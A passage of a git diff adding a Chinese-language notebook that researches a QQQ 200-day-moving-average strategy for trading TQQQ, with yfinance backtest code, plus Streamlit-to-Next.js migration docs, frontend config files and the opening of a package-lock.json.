100%`\n", + "- 横盘识别(例如 ADX 低、ATR 收缩、布林带收敛)后:\n", + " - 降低信号权重\n", + " - 提高确认阈值\n", + " - 最大仓位上限下调(例如从 100% 降到 50%)\n" + ] + }, + { + "cell_type": "markdown", + "id": "c94b8ff0", + "metadata": {}, + "source": [ + "## 二、重点风险点(必须重点回测)\n", + "\n", + "### A. 假突破风险(Whipsaw)\n", + "\n", + "- 价格短暂上穿 MA200 后快速跌回\n", + "- 典型后果:频繁开平仓、手续费和滑点吞噬收益\n", + "- 回测要看:\n", + " - 单月交易次数\n", + " - 连续亏损次数\n", + " - 胜率变化 vs 收益变化\n", + "\n", + "### B. 杠杆路径依赖风险(TQQQ 特有)\n", + "\n", + "- 即使 QQQ 横盘,TQQQ 也可能因波动损耗表现变差\n", + "- 回测要看:\n", + " - 横盘期净值回撤\n", + " - 与 QQQ 基准收益差\n", + "\n", + "### C. 宏观反身性风险\n", + "\n", + "- 宏观信号变化往往先于价格,但有时“过早”\n", + "- 回测要看:\n", + " - 宏观过滤是否显著降低回撤\n", + " - 是否过度过滤导致错过主要上涨段\n", + "\n", + "### D. 执行方式风险(直接买 vs 卖 Put)\n", + "\n", + "- 卖 Put 在急跌中可能被动接刀\n", + "- 直接买在高波动追涨时容易回撤\n", + "- 回测要看:\n", + " - 两种执行方式在不同波动 regime 下的收益/回撤\n", + " - 行权/保证金占用(若接入真实期权数据)\n", + "\n", + "### E. 仓位风险\n", + "\n", + "- 一次性满仓对策略容错极低\n", + "- 分层建仓可能错过部分涨幅但更稳健\n", + "- 回测要看:\n", + " - 收益回撤比(Calmar)\n", + " - 最大单次回撤的可承受性\n" + ] + }, + { + "cell_type": "markdown", + "id": "5c10ec5b", + "metadata": {}, + "source": [ + "## 三、回测窗口与样本期建议\n", + "\n", + "你的判断很合理:**先看 2 年更实用**。\n", + "\n", + "- 2 年窗口优点:更贴近当前市场结构(利率、AI 主题、波动节奏)\n", + "- 5 年窗口优点:包含更多 regime,但会引入过时结构\n", + "\n", + "建议采用“双层验证”:\n", + "\n", + "1. **主回测窗口**:最近 2 年(策略调参主依据)\n", + "2. **稳健性窗口**:补充 1~2 个横盘/高波动子区间(不调参,仅验鲁棒)\n", + "\n", + "### 横盘震荡重点复盘(方法)\n", + "\n", + "先不预设具体日期,而是程序化识别:\n", + "\n", + "- `QQQ` 的 20 日真实波动率低于分位阈值\n", + "- ADX 低于阈值(若你后续接 TA 指标)\n", + "- 价格在区间内来回穿越 MA200 次数高\n", + "\n", + "在这些区间单独统计:\n", + "\n", + "- 策略收益 vs 买入持有\n", + "- 交易频次\n", + "- 净值回撤\n", + "- 交易成本敏感性\n" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "895d3cf4", + "metadata": {}, + "outputs": [], + "source": [ + "import numpy as np\n", + "import pandas as pd\n", + "import yfinance as yf\n", + "\n", + "QQQ = \"QQQ\"\n", + "TQQQ = \"TQQQ\"\n", + "MACRO_TICKERS = [\"^IRX\", \"^FVX\", \"^TNX\", \"^TYX\", \"DX-Y.NYB\", \"TIP\"]\n", + "\n", + "START = (pd.Timestamp.today() - pd.DateOffset(years=2)).strftime(\"%Y-%m-%d\")\n", + "END = pd.Timestamp.today().strftime(\"%Y-%m-%d\")\n", + "\n", + "print(\"backtest window:\", START, \"->\", END)" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "fd3e36c0", + "metadata": {}, + "outputs": [], + "source": [ + "def load_price_series(ticker: str, start: str, end: str) -> pd.Series:\n", + " df = yf.download(ticker, start=start, end=end, auto_adjust=True, progress=False)\n", + " if df.empty:\n", + " raise ValueError(f\"no data for {ticker}\")\n", + " return df[\"Close\"].rename(ticker)\n", + "\n", + "\n", + "def load_macro_frame(tickers: list[str], start: str, end: str) -> pd.DataFrame:\n", + " cols = []\n", + " for t in tickers:\n", + " s = load_price_series(t, start, end)\n", + " cols.append(s)\n", + " out = pd.concat(cols, axis=1).sort_index()\n", + " return out" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "67baabe3", + "metadata": {}, + "outputs": [], + "source": [ + "def compute_lrs_signal(qqq_close: pd.Series) -> pd.DataFrame:\n", + " df = pd.DataFrame(index=qqq_close.index)\n", + " df[\"close\"] = qqq_close\n", + " df[\"ma200\"] = qqq_close.rolling(200).mean()\n", + " df[\"ma200_slope_20\"] = df[\"ma200\"].diff(20)\n", + "\n", + " # 方向层:站上/跌破 200MA\n", + " df[\"dir_long\"] = (df[\"close\"] > df[\"ma200\"]).astype(int)\n", + "\n", + " # 有效性:连续站上 3 日 + ma200 斜率为正\n", + " above = (df[\"close\"] > df[\"ma200\"]).astype(int)\n", + " df[\"above_3d\"] = (above.rolling(3).sum() == 3).astype(int)\n", + " df[\"valid_trend\"] = ((df[\"above_3d\"] == 1) & (df[\"ma200_slope_20\"] > 0)).astype(int)\n", + "\n", + " return df\n", + "\n", + "\n", + "def compute_macro_score(macro: pd.DataFrame) -> pd.Series:\n", + " # 这是一个 V0 占位打分函数,后续应替换为更严谨的经济含义映射\n", + " ret = macro.pct_change(5)\n", + " score = pd.Series(0, index=macro.index, dtype=float)\n", + "\n", + " # 方向示例(仅研究起点):\n", + " # - 美元走强可能压制风险资产\n", + " # - TIP 走强通常对风险偏好略正向\n", + " if \"DX-Y.NYB\" in ret.columns:\n", + " score += np.where(ret[\"DX-Y.NYB\"] < 0, 1, -1)\n", + " if \"TIP\" in ret.columns:\n", + " score += np.where(ret[\"TIP\"] > 0, 1, -1)\n", + "\n", + " return score.rename(\"macro_score\")" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "3f75eeec", + "metadata": {}, + "outputs": [], + "source": [ + "def position_sizing(valid_signal: pd.Series, macro_score: pd.Series) -> pd.Series:\n", + " # 仓位规则 V0:\n", + " # valid_signal=1 且 macro_score>=1 -> 100%\n", + " # valid_signal=1 且 macro_score=0 -> 50%\n", + " # 其余 -> 0%\n", + " pos = pd.Series(0.0, index=valid_signal.index)\n", + " pos[(valid_signal == 1) & (macro_score >= 1)] = 1.0\n", + " pos[(valid_signal == 1) & (macro_score == 0)] = 0.5\n", + " return pos.rename(\"target_position\")\n", + "\n", + "\n", + "def backtest_tqqq(position: pd.Series, tqqq_close: pd.Series, fee_bps: float = 2.0) -> pd.DataFrame:\n", + " ret = tqqq_close.pct_change().fillna(0.0)\n", + " pos = position.reindex(ret.index).ffill().fillna(0.0)\n", + "\n", + " turnover = pos.diff().abs().fillna(0.0)\n", + " fee = turnover * (fee_bps / 10000.0)\n", + "\n", + " strat_ret = pos.shift(1).fillna(0.0) * ret - fee\n", + " eq = (1 + strat_ret).cumprod()\n", + " bh = (1 + ret).cumprod()\n", + "\n", + " out = pd.DataFrame(\n", + " {\n", + " \"ret_tqqq\": ret,\n", + " \"position\": pos,\n", + " \"turnover\": turnover,\n", + " \"fee\": fee,\n", + " \"ret_strategy\": strat_ret,\n", + " \"equity_strategy\": eq,\n", + " \"equity_buy_hold\": bh,\n", + " }\n", + " )\n", + " return out" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "9883c29a", + "metadata": {}, + "outputs": [], + "source": [ + "qqq = load_price_series(QQQ, START, END)\n", + "tqqq = load_price_series(TQQQ, START, END)\n", + "macro = load_macro_frame(MACRO_TICKERS, START, END)\n", + "\n", + "sig = compute_lrs_signal(qqq)\n", + "score = compute_macro_score(macro)\n", + "\n", + "panel = sig.join(score, how=\"left\").ffill()\n", + "panel[\"target_position\"] = position_sizing(panel[\"valid_trend\"], panel[\"macro_score\"])\n", + "\n", + "bt = backtest_tqqq(panel[\"target_position\"], tqqq)\n", + "\n", + "panel.tail(), bt[[\"equity_strategy\", \"equity_buy_hold\", \"position\"]].tail()" + ] + }, + { + "cell_type": "markdown", + "id": "d3b9da0f", + "metadata": {}, + "source": [ + "## 四、执行方式:直接买入 vs 卖 Put(研究设计)\n", + "\n", + "你提到“当前价格偏高时,是否应卖 Put 接盘”非常关键。建议用“条件分流”来做:\n", + "\n", + "### 条件分流规则(研究版)\n", + "\n", + "- 当 `valid_trend=1` 且价格未明显偏离(例如 close 相对 MA20 的偏离不高):`direct_buy`\n", + "- 当 `valid_trend=1` 但短期偏离过大/IV 偏高:`sell_put`\n", + "\n", + "### 回测对比维度\n", + "\n", + "1. 收益:年化、累计收益\n", + "2. 风险:最大回撤、下行波动\n", + "3. 稳定性:胜率、盈亏比、连续亏损\n", + "4. 成本:交易频次、手续费、期权滑点与行权影响\n", + "\n", + "> 注意:卖 Put 研究需要期权链与成交假设,否则结论会偏乐观。\n" + ] + }, + { + "cell_type": "markdown", + "id": "f07fd291", + "metadata": {}, + "source": [ + "## 五、下一步落地计划(建议按顺序)\n", + "\n", + "1. **先固化 V0 规则**:QQQ 200MA + 简单宏观过滤 + 分层仓位(不加期权)\n", + "2. **完成 2 年主回测**:输出收益/回撤/交易频次/换手\n", + "3. **专项复盘震荡窗口**:筛选 whipsaw 最严重区间,观察策略是否过度交易\n", + "4. **加入执行分流**:引入 direct_buy vs sell_put 的条件决策\n", + "5. **参数稳定性测试**:对确认天数、仓位阈值、宏观阈值做敏感性分析\n", + "\n", + "---\n", + "\n", + "### 关键原则\n", + "\n", + "- 不追求“单期最高收益”,优先“跨区间可存活”\n", + "- 每增加一个过滤器,都要验证是否真正改善风险收益比\n", + "- 对 TQQQ 这类杠杆 ETF,回撤控制优先级高于信号数量\n" + ] + }, + { + "cell_type": "markdown", + "id": "569dcdf9", + "metadata": {}, + "source": [ + "## 六、补充研究:LRS 原始定义与当前真实案例(2026-04)\n", + "\n", + "### 1) LRS 的标准定义(Leverage for the Long Run)\n", + "\n", + "LRS(Leverage for the Long Run Strategy)在本研究中的最小规则为:\n", + "\n", + "| QQQ 与 200MA | 操作 |\n", + "|---|---|\n", + "| `QQQ 收盘 > 200MA` | 持有 TQQQ |\n", + "| `QQQ 收盘 < 200MA` | 清仓 TQQQ,转现金或短债 |\n", + "\n", + "该规则的核心是“只跟随趋势,不做主观预测”。\n", + "\n", + "### 2) 当前状态(教学样本)\n", + "\n", + "基于你提供的信息:\n", + "\n", + "- QQQ 近期处于约 `470-580` 区间波动\n", + "- QQQ 200 日均线约 `594`\n", + "- 当前 QQQ 低于 200MA\n", + "\n", + "在 LRS 规则下,这对应**离场状态**(risk-off),并且非常适合作为“跌破后如何等待再入场”的研究样本。\n", + "\n", + "### 3) 关键启发\n", + "\n", + "- 同样是跌破 200MA,宏观背景不同,后续路径完全不同。\n", + "- 因此 LRS 在实盘中应升级为:\n", + " - **均线给方向**\n", + " - **宏观给强弱与等待时长**\n", + " - **执行层决定买入方式与仓位节奏**\n" + ] + }, + { + "cell_type": "markdown", + "id": "329757cc", + "metadata": {}, + "source": [ + "## 七、六个宏观指标在 LRS 中的操作化映射\n", + "\n", + "你给出的分析非常关键:这些指标在 LRS 中不是用于“选股”,而是用于两件事:\n", + "\n", + "1. **均线信号前预警**:是否提前降仓\n", + "2. **均线信号后定性**:这次跌破是浅跌还是深跌,回仓应快还是慢\n", + "\n", + "### 指标作用与操作提示(研究版)\n", + "\n", + "| 指标 | LRS中的主作用 | 偏多/顺风 | 偏空/逆风 |\n", + "|---|---|---|---|\n", + "| `IRX` | Fed政策方向/短端利率冲击 | 平稳或下行:可提高仓位 | 快速上行:提前降仓(如100%->60%) |\n", + "| `TNX` | 科技股贴现率锚 | 高位回落:重返均线上方后可积极回仓 | 持续上行:跌破后谨慎等待 |\n", + "| `TIP` | 实际利率压力 | 止跌/回升:风险偏好改善 | 持续下跌:实际利率上升,减仓 |\n", + "| `FVX/TYX` | 曲线形态与恢复速度 | 曲线正常化:跌破后恢复可能更快 | 倒挂/长期平坦:跌破后等待更久 |\n", + "| `DX-Y.NYB` | 全球流动性与盈利折算 | 走弱/平稳:利好成长风格 | 快速走强:压制风险资产 |\n", + "\n", + "> 备注:`IRX` 在 LRS 里应被视为最高优先级观察项之一,`TNX/TIP` 为关键确认项。\n" + ] + }, + { + "cell_type": "markdown", + "id": "24cd2d7c", + "metadata": {}, + "source": [ + "## 八、LRS 宏观记分卡(V0.2)与仓位决策\n", + "\n", + "### 1) 月初记分卡(可先手工)\n", + "\n", + "对 5 组信号打分(顺风 +1,逆风 -1,中性 0):\n", + "\n", + "- `IRX`\n", + "- `TNX`\n", + "- `TIP`\n", + "- `Curve(FVX/TYX 与 IRX-TNX形态)`\n", + "- `DXY`\n", + "\n", + "`macro_total = sum(scores)`\n", + "\n", + "### 2) 均线上方时的仓位建议(持有期)\n", + "\n", + "| 宏观顺风个数 | 建议仓位(TQQQ) | 说明 |\n", + "|---|---:|---|\n", + "| 4-5 | 100% | 让杠杆充分工作 |\n", + "| 2-3 | 60%-70% | 保留进攻,控制波动衰减 |\n", + "| 0-1 | 40%-50% 或更低 | 即便在均线上方也防守 |\n", + "\n", + "### 3) 均线跌破后的回仓等待逻辑(离场期)\n", + "\n", + "| 跌破时宏观状态 | 回仓节奏 |\n", + "|---|---|\n", + "| 顺风仍有 >=3 | 可能是情绪性下破;重新站回均线可较快回仓 |\n", + "| 逆风 >=4 | 可能是基本面驱动下跌;等待 IRX 与 TNX 同步改善再回仓 |\n", + "\n", + "### 4) 执行分流(直接买 vs 卖Put)\n", + "\n", + "在“允许回仓”的前提下:\n", + "\n", + "- **直接买入**:价格偏离不大、波动中等、趋势确认充分\n", + "- **卖 Put 接盘**:价格偏高/波动偏大,偏向等更好成本入场\n", + "\n", + "> 重要:卖 Put 需要期权链数据与成交假设,回测中必须纳入权利金、行权、保证金约束。\n" + ] + }, + { + "cell_type": "markdown", + "id": "c7ee5dac", + "metadata": {}, + "source": [ + "## 九、重点回测议程(基于你提出的问题)\n", + "\n", + "建议把回测拆成 3 条主线,每条都做 2 年主窗口 + 震荡子区间专项复盘。\n", + "\n", + "### 主线 A:有效信号过滤是否有价值\n", + "\n", + "比较:\n", + "\n", + "1. 纯 LRS(仅 QQQ vs 200MA)\n", + "2. LRS + 有效性过滤(连续站上N日、MA200斜率)\n", + "3. LRS + 有效性 + 宏观记分卡\n", + "\n", + "观察:收益、最大回撤、交易次数、Calmar、横盘期表现。\n", + "\n", + "### 主线 B:执行方式比较(直接买 vs 卖Put)\n", + "\n", + "比较:\n", + "\n", + "1. 全部 direct_buy\n", + "2. 条件分流 direct_buy/sell_put\n", + "\n", + "观察:收益差、回撤差、资金占用、尾部风险(急跌时)。\n", + "\n", + "### 主线 C:仓位管理鲁棒性\n", + "\n", + "比较:\n", + "\n", + "1. 满仓策略\n", + "2. 分层仓位策略(40/70/100)\n", + "\n", + "观察:是否显著降低 TQQQ 在震荡期的净值磨损。\n", + "\n", + "---\n", + "\n", + "## 十、策略框架结论(当前版本)\n", + "\n", + "你提出的方向非常正确:LRS 不应停留在“均线二元开关”。\n", + "\n", + "当前建议的最小可交易框架是:\n", + "\n", + "- **方向**:QQQ 200MA\n", + "- **过滤**:有效性 + 宏观记分卡\n", + "- **执行**:direct_buy / sell_put 分流\n", + "- **风控**:分层仓位 + 震荡降频\n", + "\n", + "这套框架可直接作为策略页下一步实现蓝图:\n", + "\n", + "1. 先做无期权版(direct_buy)\n", + "2. 再叠加期权执行分支\n", + "3. 最后做参数稳定性与样本外验证\n" + ] + } + ], + "metadata": { + "kernelspec": { + "display_name": "Python 3", + "language": "python", + "name": "python3" + }, + "language_info": { + "name": "python" + } + }, + "nbformat": 4, + "nbformat_minor": 5 +} diff --git a/docs/migration/cutover_and_rollback.md b/docs/migration/cutover_and_rollback.md new file mode 100644 index 0000000..cb2406e --- /dev/null +++ b/docs/migration/cutover_and_rollback.md @@ -0,0 +1,23 @@ +# 切换与回滚预案 + +## 切换步骤 + +1. 保持 Streamlit 在线,新增 FastAPI + Next.js 并行运行。 +2. 通过 `docs/migration/parallel_validation_checklist.md` 完成验收。 +3. 将默认入口从 Streamlit 调整为 Next.js(文档/运维层)。 +4. Streamlit 保留为兼容入口(仅调试或灰度应急)。 + +## 回滚策略 + +- 场景:前端构建失败、API 不稳定、关键策略指标不一致。 +- 操作: + 1. 停止 Next.js 与 FastAPI。 + 2. 恢复 `streamlit run app.py` 作为唯一入口。 + 3. 记录失败版本与触发条件,修复后重新灰度。 + +## 下线 Streamlit 的前置条件 + +- 前端所有核心页面完成 API 化。 +- LRS/Wheel 策略交互全部可用。 +- 至少 1 个交易周稳定运行无 P0 问题。 + diff --git a/docs/migration/parallel_validation_checklist.md b/docs/migration/parallel_validation_checklist.md new file mode 100644 index 0000000..6dbfa0d --- /dev/null +++ b/docs/migration/parallel_validation_checklist.md @@ -0,0 +1,32 @@ +# 双栈并行验收清单 + +## 环境准备 + +- [ ] Python 依赖已安装(含 `fastapi`、`uvicorn`) +- [ ] `frontend/` 已执行 `npm install` +- [ ] `.env` 与现有 Streamlit 配置一致 + +## 启动验证 + +- [ ] `streamlit run app.py` 可正常打开 +- [ ] `python -m uvicorn backend.api.main:app --reload` 可访问 `/health` +- [ ] `npm run dev` 可打开前端首页 + +## 功能一致性 + +- [ ] 策略文档内容与 Streamlit 一致 +- [ ] LRS 聊天对同一问题返回语义一致结果 +- [ ] 回测任务可启动、查询、完成 +- [ ] 子策略切换(LRS/Wheel)行为一致 + +## 数据与指标 + +- [ ] 关键回测指标(收益率、最大回撤、交易次数)在允许误差范围内一致 +- [ ] 错误提示与空态展示可用 + +## 发布前门禁 + +- [ ] 前端构建通过(`npm run build`) +- [ ] API 健康检查通过(`/health`) +- [ ] 回滚脚本与降级路径已验证 + diff --git a/docs/migration/streamlit_to_npm_mapping.md b/docs/migration/streamlit_to_npm_mapping.md new file mode 100644 index 0000000..fffc9f6 --- /dev/null +++ b/docs/migration/streamlit_to_npm_mapping.md @@ -0,0 +1,29 @@ +# Streamlit -> npm 页面映射 + +## 路由映射 + +- `仪表盘` -> `frontend/src/app/page.tsx` +- `个股分析` -> `frontend/src/app/analysis/page.tsx` +- `策略` -> `frontend/src/app/strategy/page.tsx` +- `股票筛选` -> `frontend/src/app/screener/page.tsx` +- `股票详情` -> `frontend/src/app/stock-detail/page.tsx` +- `持仓` -> `frontend/src/app/portfolio/page.tsx` +- `策略回测` -> `frontend/src/app/backtesting/page.tsx` + +## API 映射 + +- Streamlit `session_state` 默认值 -> `GET /api/v1/state/defaults` +- 策略文档/子策略 -> `GET /api/v1/strategy/metadata` +- LRS 聊天 -> `POST /api/v1/strategy/lrs/chat` +- 回测周期 -> `GET /api/v1/backtest/periods` +- 启动回测 -> `POST /api/v1/backtest/jobs` +- 查询回测 -> `GET /api/v1/backtest/jobs/{job_id}` + +## 状态迁移 + +- `st.session_state.current_page` -> `useUiStore.currentPage` +- `st.session_state.selected_ticker` -> `useUiStore.selectedTicker` +- `st.session_state.strategy_sub_menu` -> `useUiStore.strategySubMenu` +- `st.session_state.runtime_stage` -> `useUiStore.runtimeStage` +- `st.session_state.error` -> `useUiStore.error` + diff --git a/docs/to-do.md b/docs/to-do.md new file mode 100644 index 0000000..2987005 --- /dev/null +++ b/docs/to-do.md @@ -0,0 +1 @@ +1. 想要将当前这个页面的后端到前端转换成graph的架构,检查可行性 diff --git a/frontend/.env.development b/frontend/.env.development new file mode 100644 index 0000000..3fead36 --- /dev/null +++ b/frontend/.env.development @@ -0,0 +1,3 @@ +# Next.js 在 `npm run dev` 时自动加载;无需每次手动 export。 +# 生产构建请使用平台环境变量或 `.env.production.local`(勿提交密钥)。 +NEXT_PUBLIC_API_BASE=http://127.0.0.1:8000 diff --git a/frontend/.eslintrc.json b/frontend/.eslintrc.json new file mode 100644 index 0000000..45b2e6e --- /dev/null +++ b/frontend/.eslintrc.json @@ -0,0 +1,4 @@ +{ + "extends": ["next/core-web-vitals"] +} + diff --git a/frontend/.gitignore b/frontend/.gitignore new file mode 100644 index 0000000..0449cf7 --- /dev/null +++ b/frontend/.gitignore @@ -0,0 +1,5 @@ +node_modules/ +.next/ +out/ +dist/ + diff --git a/frontend/README.md b/frontend/README.md new file mode 100644 index 0000000..51fac3d --- /dev/null +++ b/frontend/README.md @@ -0,0 +1,34 @@ +# TradingAgents Frontend + +Next.js(App Router)+ TypeScript,对接仓库根目录的 FastAPI(`backend/`)。 + +## 本地启动 + +```bash +npm ci +export NEXT_PUBLIC_API_BASE=http://127.0.0.1:8000 +npm run dev +``` + +**必须**设置 `NEXT_PUBLIC_API_BASE` 为后端根地址(无尾斜杠),与 [src/lib/api.ts](src/lib/api.ts) 中逻辑一致。未设置时,请求会失败并提示配置环境变量。 + +生产/ Vercel:在平台环境变量中设置同一变量,指向已部署的 API 域名(如 `https://api.example.com`)。 + +## 构建 + +```bash +npm ci +npm run build +``` + +若在同步盘(如 iCloud Desktop)上出现 webpack cache `.next/cache` 读超时,请在仓库本地磁盘克隆后再构建;本项目已在 `next.config.mjs` 关闭 webpack persistent cache 以降低此类概率。 + +类型检查(不依赖 webpack pack cache): + +```bash +npx tsc -p tsconfig.json --noEmit +``` + +## 样式 + +使用 Tailwind CSS v4(`tailwindcss`、`@tailwindcss/postcss`,见 [package.json](package.json))。 diff --git a/frontend/next-env.d.ts b/frontend/next-env.d.ts new file mode 100644 index 0000000..830fb59 --- /dev/null +++ b/frontend/next-env.d.ts @@ -0,0 +1,6 @@ +/// +/// +/// + +// NOTE: This file should not be edited +// see https://nextjs.org/docs/app/api-reference/config/typescript for more information. diff --git a/frontend/next.config.mjs b/frontend/next.config.mjs new file mode 100644 index 0000000..d9ca7cb --- /dev/null +++ b/frontend/next.config.mjs @@ -0,0 +1,19 @@ +import path from "node:path"; +import { fileURLToPath } from "node:url"; + +const __filename = fileURLToPath(import.meta.url); +const __dirname = path.dirname(__filename); + +/** @type {import('next').NextConfig} */ +const nextConfig = { + reactStrictMode: true, + outputFileTracingRoot: __dirname, + // Avoid webpack persistent cache on slow/cloud-sync filesystems (macOS ETIMEDOUT on `.next/cache`). + webpack: (config) => { + config.cache = false; + return config; + }, +}; + +export default nextConfig; + diff --git a/frontend/package-lock.json b/frontend/package-lock.json new file mode 100644 index 0000000..0245b70 --- /dev/null +++ b/frontend/package-lock.json @@ -0,0 +1,6131 @@ +{ + "name": "tradingagents-frontend", + "version": "0.1.0", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "tradingagents-frontend", + "version": "0.1.0", + "dependencies": { + "next": "^15.2.0", + "react": "^19.0.0", + "react-dom": "^19.0.0", + "zustand": "^5.0.3" + }, + "devDependencies": { + "@tailwindcss/postcss": "^4.1.4", + "@types/node": "^22.13.0", + "@types/react": "^19.0.10", + "@types/react-dom": "^19.0.4", + "eslint": "^9.20.1", + "eslint-config-next": "^15.2.0", + "tailwindcss": "^4.1.4", + "typescript": "^5.8.2" + } + }, + "node_modules/@alloc/quick-lru": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/@alloc/quick-lru/-/quick-lru-5.2.0.tgz", + "integrity": "sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@emnapi/core": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/@emnapi/core/-/core-1.10.0.tgz", + "integrity": "sha512-yq6OkJ4p82CAfPl0u9mQebQHKPJkY7WrIuk205cTYnYe+k2Z8YBh11FrbRG/H6ihirqcacOgl2BIO8oyMQLeXw==", + "dev": true, + "license": "MIT", + "optional": true, + "dependencies": { + "@emnapi/wasi-threads": "1.2.1", + "tslib": "^2.4.0" + } + }, + "node_modules/@emnapi/runtime": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz", + "integrity": "sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA==", + "license": "MIT", + "optional": true, + "dependencies": { + "tslib": "^2.4.0" + } + }, + "node_modules/@emnapi/wasi-threads": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/@emnapi/wasi-threads/-/wasi-threads-1.2.1.tgz", + "integrity": "sha512-uTII7OYF+/Mes/MrcIOYp5yOtSMLBWSIoLPpcgwipoiKbli6k322tcoFsxoIIxPDqW01SQGAgko4EzZi2BNv2w==", + "dev": true, + "license": "MIT", + "optional": true, + "dependencies": { + "tslib": "^2.4.0" + } + }, + "node_modules/@eslint-community/eslint-utils": { + "version": "4.9.1", + "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.9.1.tgz", + "integrity": "sha512-phrYmNiYppR7znFEdqgfWHXR6NCkZEK7hwWDHZUjit/2/U0r6XvkDl0SYnoM51Hq7FhCGdLDT6zxCCOY1hexsQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + }, + "peerDependencies": { + "eslint": "^6.0.0 || ^7.0.0 || >=8.0.0" + } + }, + "node_modules/@eslint-community/eslint-utils/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@eslint-community/regexpp": { + "version": "4.12.2", + "resolved": "https://registry.npmjs.org/@eslint-community/regexpp/-/regexpp-4.12.2.tgz", + "integrity": "sha512-EriSTlt5OC9/7SXkRSCAhfSxxoSUgBm33OH+IkwbdpgoqsSsUg7y3uh+IICI/Qg4BBWr3U2i39RpmycbxMq4ew==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^12.0.0 || ^14.0.0 || >=16.0.0" + } + }, + "node_modules/@eslint/config-array": { + "version": "0.21.2", + "resolved": "https://registry.npmjs.org/@eslint/config-array/-/config-array-0.21.2.tgz", + "integrity": "sha512-nJl2KGTlrf9GjLimgIru+V/mzgSK0ABCDQRvxw5BjURL7WfH5uoWmizbH7QB6MmnMBd8cIC9uceWnezL1VZWWw==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@eslint/object-schema": "^2.1.7", + "debug": "^4.3.1", + "minimatch": "^3.1.5" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@eslint/config-helpers": { + "version": "0.4.2", + "resolved": "https://registry.npmjs.org/@eslint/config-helpers/-/config-helpers-0.4.2.tgz", + "integrity": "sha512-gBrxN88gOIf3R7ja5K9slwNayVcZgK6SOUORm2uBzTeIEfeVaIhOpCtTox3P6R7o2jLFwLFTLnC7kU/RGcYEgw==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@eslint/core": "^0.17.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@eslint/core": { + "version": "0.17.0", + "resolved": "https://registry.npmjs.org/@eslint/core/-/core-0.17.0.tgz", + "integrity": "sha512-yL/sLrpmtDaFEiUj1osRP4TI2MDz1AddJL+jZ7KSqvBuliN4xqYY54IfdN8qD8Toa6g1iloph1fxQNkjOxrrpQ==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@types/json-schema": "^7.0.15" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@eslint/eslintrc": { + "version": "3.3.5", + "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-3.3.5.tgz", + "integrity": "sha512-4IlJx0X0qftVsN5E+/vGujTRIFtwuLbNsVUe7TO6zYPDR1O6nFwvwhIKEKSrl6dZchmYBITazxKoUYOjdtjlRg==", + "dev": true, + "license": "MIT", + "dependencies": { + "ajv": "^6.14.0", + "debug": "^4.3.2", + "espree": "^10.0.1", + "globals": "^14.0.0", + "ignore": "^5.2.0", + "import-fresh": "^3.2.1", + "js-yaml": "^4.1.1", + "minimatch": "^3.1.5", + "strip-json-comments": "^3.1.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@eslint/js": { + "version": "9.39.4", + "resolved": "https://registry.npmjs.org/@eslint/js/-/js-9.39.4.tgz", + "integrity": "sha512-nE7DEIchvtiFTwBw4Lfbu59PG+kCofhjsKaCWzxTpt4lfRjRMqG6uMBzKXuEcyXhOHoUp9riAm7/aWYGhXZ9cw==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://eslint.org/donate" + } + }, + "node_modules/@eslint/object-schema": { + "version": "2.1.7", + "resolved": "https://registry.npmjs.org/@eslint/object-schema/-/object-schema-2.1.7.tgz", + "integrity": "sha512-VtAOaymWVfZcmZbp6E2mympDIHvyjXs/12LqWYjVw6qjrfF+VK+fyG33kChz3nnK+SU5/NeHOqrTEHS8sXO3OA==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@eslint/plugin-kit": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/@eslint/plugin-kit/-/plugin-kit-0.4.1.tgz", + "integrity": 